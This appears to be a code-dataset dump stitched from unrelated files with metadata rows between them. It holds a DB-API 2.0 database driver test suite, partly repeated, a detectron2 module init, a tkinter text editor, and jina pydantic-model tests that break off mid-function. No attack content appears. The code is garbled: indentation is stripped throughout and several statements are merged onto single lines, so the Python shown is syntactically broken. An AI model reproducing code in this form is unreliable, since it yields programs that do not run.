self._paraminsert(cur) # Make sure the cursor still works
finally:
con.close()
def test_setoutputsize(self):
# Real test for setoutputsize is driver dependent
raise NotImplementedError('Driver needed to override this test')
def test_None(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
cur.execute('insert into %sbooze values (NULL)' % self.table_prefix)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchall()
self.assertEqual(len(r),1)
self.assertEqual(len(r[0]),1)
self.assertEqual(r[0][0],None,'NULL value not returned as None')
finally:
con.close()
def test_Date(self):
d1 = self.driver.Date(2002,12,25)
d2 = self.driver.DateFromTicks(time.mktime((2002,12,25,0,0,0,0,0,0)))
# Can we assume this? API doesn't specify, but it seems implied
# self.assertEqual(str(d1),str(d2))
def test_Time(self):
t1 = self.driver.Time(13,45,30)
t2 = self.driver.TimeFromTicks(time.mktime((2001,1,1,13,45,30,0,0,0)))
# Can we assume this? API doesn't specify, but it seems implied
# self.assertEqual(str(t1),str(t2))
def test_Timestamp(self):
t1 = self.driver.Timestamp(2002,12,25,13,45,30)
t2 = self.driver.TimestampFromTicks(
time.mktime((2002,12,25,13,45,30,0,0,0))
)
# Can we assume this? API doesn't specify, but it seems implied
# self.assertEqual(str(t1),str(t2))
def test_Binary(self):
b = self.driver.Binary(str2bytes('Something'))
b = self.driver.Binary(str2bytes(''))
def test_STRING(self):
self.failUnless(hasattr(self.driver,'STRING'),
'module.STRING must be defined'
)
def test_BINARY(self):
self.failUnless(hasattr(self.driver,'BINARY'),
'module.BINARY must be defined.'
)
def test_NUMBER(self):
self.failUnless(hasattr(self.driver,'NUMBER'),
'module.NUMBER must be defined.'
)
def test_DATETIME(self):
self.failUnless(hasattr(self.driver,'DATETIME'),
'module.DATETIME must be defined.'
)
def test_ROWID(self):
self.failUnless(hasattr(self.driver,'ROWID'),
'module.ROWID must be defined.'
)
| 36.982818
| 80
| 0.563805
|
__rcs_id__ = '$Id: dbapi20.py,v 1.11 2005/01/02 02:41:01 zenzen Exp $'
__version__ = '$Revision: 1.12 $'[11:-2]
__author__ = 'Stuart Bishop <stuart@stuartbishop.net>'
import unittest
import time
import sys
def str2bytes(sval):
if sys.version_info < (3,0) and isinstance(sval, str):
sval = sval.decode("latin1")
return sval.encode("latin1")
class DatabaseAPI20Test(unittest.TestCase):
driver = None
connect_args = () connect_kw_args = {} table_prefix = 'dbapi20test_'
ddl1 = 'create table %sbooze (name varchar(20))' % table_prefix
ddl2 = 'create table %sbarflys (name varchar(20))' % table_prefix
xddl1 = 'drop table %sbooze' % table_prefix
xddl2 = 'drop table %sbarflys' % table_prefix
lowerfunc = 'lower'
def executeDDL1(self,cursor):
cursor.execute(self.ddl1)
def executeDDL2(self,cursor):
cursor.execute(self.ddl2)
def setUp(self):
pass
def tearDown(self):
con = self._connect()
try:
cur = con.cursor()
for ddl in (self.xddl1,self.xddl2):
try:
cur.execute(ddl)
con.commit()
except self.driver.Error:
# execute is busted.
pass
finally:
con.close()
def _connect(self):
try:
return self.driver.connect(
*self.connect_args,**self.connect_kw_args
)
except AttributeError:
self.fail("No connect method found in self.driver module")
def test_connect(self):
con = self._connect()
con.close()
def test_apilevel(self):
try:
# Must exist
apilevel = self.driver.apilevel
# Must equal 2.0
self.assertEqual(apilevel,'2.0')
except AttributeError:
self.fail("Driver doesn't define apilevel")
def test_threadsafety(self):
try:
threadsafety = self.driver.threadsafety
self.failUnless(threadsafety in (0,1,2,3))
except AttributeError:
self.fail("Driver doesn't define threadsafety")
def test_paramstyle(self):
try:
# Must exist
paramstyle = self.driver.paramstyle
# Must be a valid value
self.failUnless(paramstyle in (
'qmark','numeric','named','format','pyformat'
))
except AttributeError:
self.fail("Driver doesn't define paramstyle")
def test_Exceptions(self):
if sys.version[0] == '3': self.failUnless(issubclass(self.driver.Warning,Exception))
self.failUnless(issubclass(self.driver.Error,Exception))
else:
self.failUnless(issubclass(self.driver.Warning,StandardError))
self.failUnless(issubclass(self.driver.Error,StandardError))
self.failUnless(
issubclass(self.driver.InterfaceError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.DatabaseError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.OperationalError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.IntegrityError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.InternalError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.ProgrammingError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.NotSupportedError,self.driver.Error)
)
def test_ExceptionsAsConnectionAttributes(self):
con = self._connect()
drv = self.driver
self.failUnless(con.Warning is drv.Warning)
self.failUnless(con.Error is drv.Error)
self.failUnless(con.InterfaceError is drv.InterfaceError)
self.failUnless(con.DatabaseError is drv.DatabaseError)
self.failUnless(con.OperationalError is drv.OperationalError)
self.failUnless(con.IntegrityError is drv.IntegrityError)
self.failUnless(con.InternalError is drv.InternalError)
self.failUnless(con.ProgrammingError is drv.ProgrammingError)
self.failUnless(con.NotSupportedError is drv.NotSupportedError)
def test_commit(self):
con = self._connect()
try:
con.commit()
finally:
con.close()
def test_rollback(self):
con = self._connect()
# If rollback is defined, it should either work or throw
# the documented exception
if hasattr(con,'rollback'):
try:
con.rollback()
except self.driver.NotSupportedError:
pass
def test_cursor(self):
con = self._connect()
try:
cur = con.cursor()
finally:
con.close()
def test_cursor_isolation(self):
con = self._connect()
try:
# Make sure cursors created from the same connection have
# the documented transaction isolation level
cur1 = con.cursor()
cur2 = con.cursor()
self.executeDDL1(cur1)
cur1.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
cur2.execute("select name from %sbooze" % self.table_prefix)
booze = cur2.fetchall()
self.assertEqual(len(booze),1)
self.assertEqual(len(booze[0]),1)
self.assertEqual(booze[0][0],'Victoria Bitter')
finally:
con.close()
def test_description(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
self.assertEqual(cur.description,None,
'cursor.description should be none after executing a '
'statement that can return no rows (such as DDL)'
)
cur.execute('select name from %sbooze' % self.table_prefix)
self.assertEqual(len(cur.description),1,
'cursor.description describes too many columns'
)
self.assertEqual(len(cur.description[0]),7,
'cursor.description[x] tuples must have 7 elements'
)
self.assertEqual(cur.description[0][0].lower(),'name',
'cursor.description[x][0] must return column name'
)
self.assertEqual(cur.description[0][1],self.driver.STRING,
'cursor.description[x][1] must return column type. Got %r'
% cur.description[0][1]
)
# Make sure self.description gets reset
self.executeDDL2(cur)
self.assertEqual(cur.description,None,
'cursor.description not being set to None when executing '
'no-result statements (eg. DDL)'
)
finally:
con.close()
def test_rowcount(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
self.assertEqual(cur.rowcount,-1,
'cursor.rowcount should be -1 after executing no-result '
'statements'
)
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.failUnless(cur.rowcount in (-1,1),
'cursor.rowcount should == number or rows inserted, or '
'set to -1 after executing an insert statement'
)
cur.execute("select name from %sbooze" % self.table_prefix)
self.failUnless(cur.rowcount in (-1,1),
'cursor.rowcount should == number of rows returned, or '
'set to -1 after executing a select statement'
)
self.executeDDL2(cur)
self.assertEqual(cur.rowcount,-1,
'cursor.rowcount not being reset to -1 after executing '
'no-result statements'
)
finally:
con.close()
lower_func = 'lower'
def test_callproc(self):
con = self._connect()
try:
cur = con.cursor()
if self.lower_func and hasattr(cur,'callproc'):
r = cur.callproc(self.lower_func,('FOO',))
self.assertEqual(len(r),1)
self.assertEqual(r[0],'FOO')
r = cur.fetchall()
self.assertEqual(len(r),1,'callproc produced no result set')
self.assertEqual(len(r[0]),1,
'callproc produced invalid result set'
)
self.assertEqual(r[0][0],'foo',
'callproc produced invalid results'
)
finally:
con.close()
def test_close(self):
con = self._connect()
try:
cur = con.cursor()
finally:
con.close()
# cursor.execute should raise an Error if called after connection
# closed
self.assertRaises(self.driver.Error,self.executeDDL1,cur)
# connection.commit should raise an Error if called after connection'
self.assertRaises(self.driver.Error,con.commit)
# connection.close should raise an Error if called more than once
# Issue discussed on DB-SIG: consensus seem that close() should not
# raised if called on closed objects. Issue reported back to Stuart.
# self.assertRaises(self.driver.Error,con.close)
def test_execute(self):
con = self._connect()
try:
cur = con.cursor()
self._paraminsert(cur)
finally:
con.close()
def _paraminsert(self,cur):
self.executeDDL1(cur)
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.failUnless(cur.rowcount in (-1,1))
if self.driver.paramstyle == 'qmark':
cur.execute(
'insert into %sbooze values (?)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'numeric':
cur.execute(
'insert into %sbooze values (:1)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'named':
cur.execute(
'insert into %sbooze values (:beer)' % self.table_prefix,
{'beer':"Cooper's"}
)
elif self.driver.paramstyle == 'format':
cur.execute(
'insert into %sbooze values (%%s)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'pyformat':
cur.execute(
'insert into %sbooze values (%%(beer)s)' % self.table_prefix,
{'beer':"Cooper's"}
)
else:
self.fail('Invalid paramstyle')
self.failUnless(cur.rowcount in (-1,1))
cur.execute('select name from %sbooze' % self.table_prefix)
res = cur.fetchall()
self.assertEqual(len(res),2,'cursor.fetchall returned too few rows')
beers = [res[0][0],res[1][0]]
beers.sort()
self.assertEqual(beers[0],"Cooper's",
'cursor.fetchall retrieved incorrect data, or data inserted '
'incorrectly'
)
self.assertEqual(beers[1],"Victoria Bitter",
'cursor.fetchall retrieved incorrect data, or data inserted '
'incorrectly'
)
def test_executemany(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
largs = [ ("Cooper's",) , ("Boag's",) ]
margs = [ {'beer': "Cooper's"}, {'beer': "Boag's"} ]
if self.driver.paramstyle == 'qmark':
cur.executemany(
'insert into %sbooze values (?)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'numeric':
cur.executemany(
'insert into %sbooze values (:1)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'named':
cur.executemany(
'insert into %sbooze values (:beer)' % self.table_prefix,
margs
)
elif self.driver.paramstyle == 'format':
cur.executemany(
'insert into %sbooze values (%%s)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'pyformat':
cur.executemany(
'insert into %sbooze values (%%(beer)s)' % (
self.table_prefix
),
margs
)
else:
self.fail('Unknown paramstyle')
self.failUnless(cur.rowcount in (-1,2),
'insert using cursor.executemany set cursor.rowcount to '
'incorrect value %r' % cur.rowcount
)
cur.execute('select name from %sbooze' % self.table_prefix)
res = cur.fetchall()
self.assertEqual(len(res),2,
'cursor.fetchall retrieved incorrect number of rows'
)
beers = [res[0][0],res[1][0]]
beers.sort()
self.assertEqual(beers[0],"Boag's",'incorrect data retrieved')
self.assertEqual(beers[1],"Cooper's",'incorrect data retrieved')
finally:
con.close()
def test_fetchone(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchone should raise an Error if called before
# executing a select-type query
self.assertRaises(self.driver.Error,cur.fetchone)
# cursor.fetchone should raise an Error if called after
# executing a query that cannot return rows
self.executeDDL1(cur)
self.assertRaises(self.driver.Error,cur.fetchone)
cur.execute('select name from %sbooze' % self.table_prefix)
self.assertEqual(cur.fetchone(),None,
'cursor.fetchone should return None if a query retrieves '
'no rows'
)
self.failUnless(cur.rowcount in (-1,0))
# cursor.fetchone should raise an Error if called after
# executing a query that cannot return rows
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.assertRaises(self.driver.Error,cur.fetchone)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchone()
self.assertEqual(len(r),1,
'cursor.fetchone should have retrieved a single row'
)
self.assertEqual(r[0],'Victoria Bitter',
'cursor.fetchone retrieved incorrect data'
)
self.assertEqual(cur.fetchone(),None,
'cursor.fetchone should return None if no more rows available'
)
self.failUnless(cur.rowcount in (-1,1))
finally:
con.close()
samples = [
'Carlton Cold',
'Carlton Draft',
'Mountain Goat',
'Redback',
'Victoria Bitter',
'XXXX'
]
def _populate(self):
populate = [
"insert into %sbooze values ('%s')" % (self.table_prefix,s)
for s in self.samples
]
return populate
def test_fetchmany(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchmany should raise an Error if called without
#issuing a query
self.assertRaises(self.driver.Error,cur.fetchmany,4)
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchmany()
self.assertEqual(len(r),1,
'cursor.fetchmany retrieved incorrect number of rows, '
'default of arraysize is one.'
)
cur.arraysize=10
r = cur.fetchmany(3) # Should get 3 rows
self.assertEqual(len(r),3,
'cursor.fetchmany retrieved incorrect number of rows'
)
r = cur.fetchmany(4) # Should get 2 more
self.assertEqual(len(r),2,
'cursor.fetchmany retrieved incorrect number of rows'
)
r = cur.fetchmany(4) # Should be an empty sequence
self.assertEqual(len(r),0,
'cursor.fetchmany should return an empty sequence after '
'results are exhausted'
)
self.failUnless(cur.rowcount in (-1,6))
# Same as above, using cursor.arraysize
cur.arraysize=4
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchmany() # Should get 4 rows
self.assertEqual(len(r),4,
'cursor.arraysize not being honoured by fetchmany'
)
r = cur.fetchmany() # Should get 2 more
self.assertEqual(len(r),2)
r = cur.fetchmany() # Should be an empty sequence
self.assertEqual(len(r),0)
self.failUnless(cur.rowcount in (-1,6))
cur.arraysize=6
cur.execute('select name from %sbooze' % self.table_prefix)
rows = cur.fetchmany() # Should get all rows
self.failUnless(cur.rowcount in (-1,6))
self.assertEqual(len(rows),6)
self.assertEqual(len(rows),6)
rows = [r[0] for r in rows]
rows.sort()
# Make sure we get the right data back out
for i in range(0,6):
self.assertEqual(rows[i],self.samples[i],
'incorrect data retrieved by cursor.fetchmany'
)
rows = cur.fetchmany() # Should return an empty list
self.assertEqual(len(rows),0,
'cursor.fetchmany should return an empty sequence if '
'called after the whole result set has been fetched'
)
self.failUnless(cur.rowcount in (-1,6))
self.executeDDL2(cur)
cur.execute('select name from %sbarflys' % self.table_prefix)
r = cur.fetchmany() # Should get empty sequence
self.assertEqual(len(r),0,
'cursor.fetchmany should return an empty sequence if '
'query retrieved no rows'
)
self.failUnless(cur.rowcount in (-1,0))
finally:
con.close()
def test_fetchall(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchall should raise an Error if called
# without executing a query that may return rows (such
# as a select)
self.assertRaises(self.driver.Error, cur.fetchall)
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
# cursor.fetchall should raise an Error if called
# after executing a a statement that cannot return rows
self.assertRaises(self.driver.Error,cur.fetchall)
cur.execute('select name from %sbooze' % self.table_prefix)
rows = cur.fetchall()
self.failUnless(cur.rowcount in (-1,len(self.samples)))
self.assertEqual(len(rows),len(self.samples),
'cursor.fetchall did not retrieve all rows'
)
rows = [r[0] for r in rows]
rows.sort()
for i in range(0,len(self.samples)):
self.assertEqual(rows[i],self.samples[i],
'cursor.fetchall retrieved incorrect rows'
)
rows = cur.fetchall()
self.assertEqual(
len(rows),0,
'cursor.fetchall should return an empty list if called '
'after the whole result set has been fetched'
)
self.failUnless(cur.rowcount in (-1,len(self.samples)))
self.executeDDL2(cur)
cur.execute('select name from %sbarflys' % self.table_prefix)
rows = cur.fetchall()
self.failUnless(cur.rowcount in (-1,0))
self.assertEqual(len(rows),0,
'cursor.fetchall should return an empty list if '
'a select query returns no rows'
)
finally:
con.close()
def test_mixedfetch(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
cur.execute('select name from %sbooze' % self.table_prefix)
rows1 = cur.fetchone()
rows23 = cur.fetchmany(2)
rows4 = cur.fetchone()
rows56 = cur.fetchall()
self.failUnless(cur.rowcount in (-1,6))
self.assertEqual(len(rows23),2,
'fetchmany returned incorrect number of rows'
)
self.assertEqual(len(rows56),2,
'fetchall returned incorrect number of rows'
)
rows = [rows1[0]]
rows.extend([rows23[0][0],rows23[1][0]])
rows.append(rows4[0])
rows.extend([rows56[0][0],rows56[1][0]])
rows.sort()
for i in range(0,len(self.samples)):
self.assertEqual(rows[i],self.samples[i],
'incorrect data retrieved or inserted'
)
finally:
con.close()
def help_nextset_setUp(self,cur):
raise NotImplementedError('Helper not implemented')
#sql="""
# create procedure deleteme as
# begin
# select count(*) from booze
# select name from booze
# end
#"""
#cur.execute(sql)
def help_nextset_tearDown(self,cur):
raise NotImplementedError('Helper not implemented')
#cur.execute("drop procedure deleteme")
def test_nextset(self):
con = self._connect()
try:
cur = con.cursor()
if not hasattr(cur,'nextset'):
return
try:
self.executeDDL1(cur)
sql=self._populate()
for sql in self._populate():
cur.execute(sql)
self.help_nextset_setUp(cur)
cur.callproc('deleteme')
numberofrows=cur.fetchone()
assert numberofrows[0]== len(self.samples)
assert cur.nextset()
names=cur.fetchall()
assert len(names) == len(self.samples)
s=cur.nextset()
assert s == None,'No more return sets, should return None'
finally:
self.help_nextset_tearDown(cur)
finally:
con.close()
def test_nextset(self):
raise NotImplementedError('Drivers need to override this test')
def test_arraysize(self):
# Not much here - rest of the tests for this are in test_fetchmany
con = self._connect()
try:
cur = con.cursor()
self.failUnless(hasattr(cur,'arraysize'),
'cursor.arraysize must be defined'
)
finally:
con.close()
def test_setinputsizes(self):
con = self._connect()
try:
cur = con.cursor()
cur.setinputsizes( (25,) )
self._paraminsert(cur) # Make sure cursor still works
finally:
con.close()
def test_setoutputsize_basic(self):
# Basic test is to make sure setoutputsize doesn't blow up
con = self._connect()
try:
cur = con.cursor()
cur.setoutputsize(1000)
cur.setoutputsize(2000,0)
self._paraminsert(cur) finally:
con.close()
def test_setoutputsize(self):
raise NotImplementedError('Driver needed to override this test')
def test_None(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
cur.execute('insert into %sbooze values (NULL)' % self.table_prefix)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchall()
self.assertEqual(len(r),1)
self.assertEqual(len(r[0]),1)
self.assertEqual(r[0][0],None,'NULL value not returned as None')
finally:
con.close()
def test_Date(self):
d1 = self.driver.Date(2002,12,25)
d2 = self.driver.DateFromTicks(time.mktime((2002,12,25,0,0,0,0,0,0)))
# self.assertEqual(str(d1),str(d2))
def test_Time(self):
t1 = self.driver.Time(13,45,30)
t2 = self.driver.TimeFromTicks(time.mktime((2001,1,1,13,45,30,0,0,0)))
# Can we assume this? API doesn't specify, but it seems implied
def test_Timestamp(self):
t1 = self.driver.Timestamp(2002,12,25,13,45,30)
t2 = self.driver.TimestampFromTicks(
time.mktime((2002,12,25,13,45,30,0,0,0))
)
# self.assertEqual(str(t1),str(t2))
def test_Binary(self):
b = self.driver.Binary(str2bytes('Something'))
b = self.driver.Binary(str2bytes(''))
def test_STRING(self):
self.failUnless(hasattr(self.driver,'STRING'),
'module.STRING must be defined'
)
def test_BINARY(self):
self.failUnless(hasattr(self.driver,'BINARY'),
'module.BINARY must be defined.'
)
def test_NUMBER(self):
self.failUnless(hasattr(self.driver,'NUMBER'),
'module.NUMBER must be defined.'
)
def test_DATETIME(self):
self.failUnless(hasattr(self.driver,'DATETIME'),
'module.DATETIME must be defined.'
)
def test_ROWID(self):
self.failUnless(hasattr(self.driver,'ROWID'),
'module.ROWID must be defined.'
)
| true
| true
|
f707c0ae92a93fe6a51157199678cfdc29d63820
| 647
|
py
|
Python
|
detectron2/modeling/roi_heads/__init__.py
|
MargeryLab/BMaskR-CNN
|
41f63d301d6be7fa30ba281a5a0f727fbca6ad2a
|
[
"Apache-2.0"
] | null | null | null |
detectron2/modeling/roi_heads/__init__.py
|
MargeryLab/BMaskR-CNN
|
41f63d301d6be7fa30ba281a5a0f727fbca6ad2a
|
[
"Apache-2.0"
] | null | null | null |
detectron2/modeling/roi_heads/__init__.py
|
MargeryLab/BMaskR-CNN
|
41f63d301d6be7fa30ba281a5a0f727fbca6ad2a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from .box_head import ROI_BOX_HEAD_REGISTRY, build_box_head
from .keypoint_head import ROI_KEYPOINT_HEAD_REGISTRY, build_keypoint_head, BaseKeypointRCNNHead
from .mask_head import ROI_MASK_HEAD_REGISTRY, build_mask_head, BaseMaskRCNNHead
from .roi_heads import (
ROI_HEADS_REGISTRY,
ROIHeads,
Res5ROIHeads,
StandardROIHeads,
build_roi_heads,
select_foreground_proposals,
)
from .rotated_fast_rcnn import RROIHeads
from .fast_rcnn import FastRCNNOutputLayers
from . import cascade_rcnn # isort:skip
__all__ = list(globals().keys())
| 34.052632
| 97
| 0.788253
|
from .box_head import ROI_BOX_HEAD_REGISTRY, build_box_head
from .keypoint_head import ROI_KEYPOINT_HEAD_REGISTRY, build_keypoint_head, BaseKeypointRCNNHead
from .mask_head import ROI_MASK_HEAD_REGISTRY, build_mask_head, BaseMaskRCNNHead
from .roi_heads import (
ROI_HEADS_REGISTRY,
ROIHeads,
Res5ROIHeads,
StandardROIHeads,
build_roi_heads,
select_foreground_proposals,
)
from .rotated_fast_rcnn import RROIHeads
from .fast_rcnn import FastRCNNOutputLayers
from . import cascade_rcnn
__all__ = list(globals().keys())
| true
| true
|
f707c12de9ebdb3505ba90ea1666b679abd69286
| 3,352
|
py
|
Python
|
main.py
|
JustKappaMan/Ugly-Text-Editor
|
40fb9e72afde335335adec25bdebbdee1f5c44e7
|
[
"MIT"
] | null | null | null |
main.py
|
JustKappaMan/Ugly-Text-Editor
|
40fb9e72afde335335adec25bdebbdee1f5c44e7
|
[
"MIT"
] | null | null | null |
main.py
|
JustKappaMan/Ugly-Text-Editor
|
40fb9e72afde335335adec25bdebbdee1f5c44e7
|
[
"MIT"
] | null | null | null |
import os.path
import tkinter as tk
import tkinter.filedialog as fd
import tkinter.messagebox as mb
def main():
text_editor = TextEditor()
text_editor.mainloop()
class TextEditor(tk.Tk):
def __init__(self):
super(TextEditor, self).__init__()
self.title('Ugly Text Editor')
self.option_add('*Dialog.msg.font', 'Arial 12')
self.minsize(640, 360)
self.maxsize(self.winfo_screenwidth(), self.winfo_screenheight())
self.scrollbar = tk.Scrollbar(self)
self.scrollbar.pack(fill='y', side='right')
self.text_field = tk.Text(self, bd=0, highlightthickness=0, yscrollcommand=self.scrollbar.set)
self.text_field.pack(fill='both', expand=True)
self.scrollbar.config(command=self.text_field.yview)
self.menu_bar = tk.Menu(self)
self.file_menu = tk.Menu(self.menu_bar, tearoff=0)
self.file_menu.add_command(label='New', accelerator='Ctrl+N', command=self.new_file)
self.file_menu.add_command(label='Open...', accelerator='Ctrl+O', command=self.open_file)
self.file_menu.add_separator()
self.file_menu.add_command(label='Save', accelerator='Ctrl+S', command=self.save_file)
self.file_menu.add_command(label='Save as...', accelerator='Ctrl+Shift+S', command=self.save_file_as)
self.file_menu.add_separator()
self.file_menu.add_command(label='Quit', accelerator='Ctrl+Q', command=self.quit)
self.menu_bar.add_cascade(label='File', menu=self.file_menu)
self.menu_bar.add_command(label='About', command=TextEditor.show_about)
self.config(menu=self.menu_bar)
self.bind('<Control-n>', lambda e: self.new_file())
self.bind('<Control-N>', lambda e: self.new_file())
self.bind('<Control-o>', lambda e: self.open_file())
self.bind('<Control-O>', lambda e: self.open_file())
self.bind('<Control-s>', lambda e: self.save_file())
self.bind('<Control-S>', lambda e: self.save_file())
self.bind('<Control-Shift-s>', lambda e: self.save_file_as())
self.bind('<Control-Shift-S>', lambda e: self.save_file_as())
self.bind('<Control-q>', lambda e: self.quit())
self.bind('<Control-Q>', lambda e: self.quit())
self.filename = None
def new_file(self):
self.filename = None
self.text_field.delete('1.0', 'end')
def open_file(self):
self.filename = fd.askopenfilename()
if self.filename and os.path.isfile(self.filename):
with open(self.filename, 'r') as f:
self.text_field.delete('1.0', 'end')
self.text_field.insert('end', f.read())
def save_file(self):
if self.filename and os.path.isfile(self.filename):
with open(self.filename, 'w') as f:
f.write(self.text_field.get('1.0', 'end'))
else:
self.save_file_as()
def save_file_as(self):
self.filename = fd.asksaveasfilename()
if self.filename:
with open(self.filename, 'w') as f:
f.write(self.text_field.get('1.0', 'end'))
@staticmethod
def show_about():
mb.showinfo(
'About',
'Ugly Text Editor v1.0\nDeveloped by Kirill Volozhanin\ngithub.com/JustKappaMan',
)
if __name__ == '__main__':
main()
| 34.916667
| 109
| 0.627685
|
import os.path
import tkinter as tk
import tkinter.filedialog as fd
import tkinter.messagebox as mb
def main():
text_editor = TextEditor()
text_editor.mainloop()
class TextEditor(tk.Tk):
def __init__(self):
super(TextEditor, self).__init__()
self.title('Ugly Text Editor')
self.option_add('*Dialog.msg.font', 'Arial 12')
self.minsize(640, 360)
self.maxsize(self.winfo_screenwidth(), self.winfo_screenheight())
self.scrollbar = tk.Scrollbar(self)
self.scrollbar.pack(fill='y', side='right')
self.text_field = tk.Text(self, bd=0, highlightthickness=0, yscrollcommand=self.scrollbar.set)
self.text_field.pack(fill='both', expand=True)
self.scrollbar.config(command=self.text_field.yview)
self.menu_bar = tk.Menu(self)
self.file_menu = tk.Menu(self.menu_bar, tearoff=0)
self.file_menu.add_command(label='New', accelerator='Ctrl+N', command=self.new_file)
self.file_menu.add_command(label='Open...', accelerator='Ctrl+O', command=self.open_file)
self.file_menu.add_separator()
self.file_menu.add_command(label='Save', accelerator='Ctrl+S', command=self.save_file)
self.file_menu.add_command(label='Save as...', accelerator='Ctrl+Shift+S', command=self.save_file_as)
self.file_menu.add_separator()
self.file_menu.add_command(label='Quit', accelerator='Ctrl+Q', command=self.quit)
self.menu_bar.add_cascade(label='File', menu=self.file_menu)
self.menu_bar.add_command(label='About', command=TextEditor.show_about)
self.config(menu=self.menu_bar)
self.bind('<Control-n>', lambda e: self.new_file())
self.bind('<Control-N>', lambda e: self.new_file())
self.bind('<Control-o>', lambda e: self.open_file())
self.bind('<Control-O>', lambda e: self.open_file())
self.bind('<Control-s>', lambda e: self.save_file())
self.bind('<Control-S>', lambda e: self.save_file())
self.bind('<Control-Shift-s>', lambda e: self.save_file_as())
self.bind('<Control-Shift-S>', lambda e: self.save_file_as())
self.bind('<Control-q>', lambda e: self.quit())
self.bind('<Control-Q>', lambda e: self.quit())
self.filename = None
def new_file(self):
self.filename = None
self.text_field.delete('1.0', 'end')
def open_file(self):
self.filename = fd.askopenfilename()
if self.filename and os.path.isfile(self.filename):
with open(self.filename, 'r') as f:
self.text_field.delete('1.0', 'end')
self.text_field.insert('end', f.read())
def save_file(self):
if self.filename and os.path.isfile(self.filename):
with open(self.filename, 'w') as f:
f.write(self.text_field.get('1.0', 'end'))
else:
self.save_file_as()
def save_file_as(self):
self.filename = fd.asksaveasfilename()
if self.filename:
with open(self.filename, 'w') as f:
f.write(self.text_field.get('1.0', 'end'))
@staticmethod
def show_about():
mb.showinfo(
'About',
'Ugly Text Editor v1.0\nDeveloped by Kirill Volozhanin\ngithub.com/JustKappaMan',
)
if __name__ == '__main__':
main()
| true
| true
|
f707c1f72b166d564102c71fd7bea8a334d81170
| 10,269
|
py
|
Python
|
tests/unit/peapods/runtimes/gateway/http/test_models.py
|
Akshat-unt/jina
|
b0b058f99f3ee4dcbcbbf2acbf04c5d7e7e9c717
|
[
"Apache-2.0"
] | 1
|
2021-12-18T06:54:49.000Z
|
2021-12-18T06:54:49.000Z
|
tests/unit/peapods/runtimes/gateway/http/test_models.py
|
Akshat-unt/jina
|
b0b058f99f3ee4dcbcbbf2acbf04c5d7e7e9c717
|
[
"Apache-2.0"
] | 2
|
2021-12-17T15:22:12.000Z
|
2021-12-18T07:19:06.000Z
|
tests/unit/peapods/runtimes/gateway/http/test_models.py
|
Akshat-unt/jina
|
b0b058f99f3ee4dcbcbbf2acbf04c5d7e7e9c717
|
[
"Apache-2.0"
] | null | null | null |
import pydantic
import pytest
from jina.peapods.runtimes.gateway.http.models import (
PROTO_TO_PYDANTIC_MODELS,
JinaRequestModel,
)
from jina.types.document import Document
from tests import random_docs
def test_schema_invocation():
for v in vars(PROTO_TO_PYDANTIC_MODELS).values():
v.schema()
v.schema_json()
def test_existing_definitions():
"""This tests: all internal schema definitions are part of parent"""
for i in [
'QuantizationMode',
'DenseNdArrayProto',
'SparseNdArrayProto',
'NdArrayProto',
'NamedScoreProto',
'DocumentProto',
]:
assert (
i in PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()['definitions'].keys()
)
def test_enum_definitions():
"""This tests: all enums are defined properly as different levels"""
quantization_enum_definition = PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()[
'definitions'
]['QuantizationMode']
assert quantization_enum_definition['enum'] == [0, 1, 2, 3]
status_code_enum_definition = PROTO_TO_PYDANTIC_MODELS.StatusProto().schema()[
'definitions'
]['StatusCode']
assert status_code_enum_definition['enum'] == [0, 1, 2, 3, 4, 5, 6]
command_enum_definition = PROTO_TO_PYDANTIC_MODELS.RequestProto().schema()[
'definitions'
]['Command']
assert command_enum_definition['enum'] == [0, 1, 2, 3, 4, 5, 6]
def test_all_fields_in_document_proto():
"""This tests: all fields are picked from the proto definition"""
document_proto_properties = PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema(
by_alias=False
)['definitions']['DocumentProto']['properties']
for i in [
'id',
'granularity',
'adjacency',
'parent_id',
'chunks',
'weight',
'matches',
'mime_type',
'uri',
'tags',
'location',
'offset',
'embedding',
'scores',
'modality',
'evaluations',
]:
assert i in document_proto_properties
document_proto_properties_alias = PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()[
'definitions'
]['DocumentProto']['properties']
for i in ['parentId', 'mimeType']:
assert i in document_proto_properties_alias
def test_oneof_text():
"""This tests: oneof field is correctly represented as `anyOf`"""
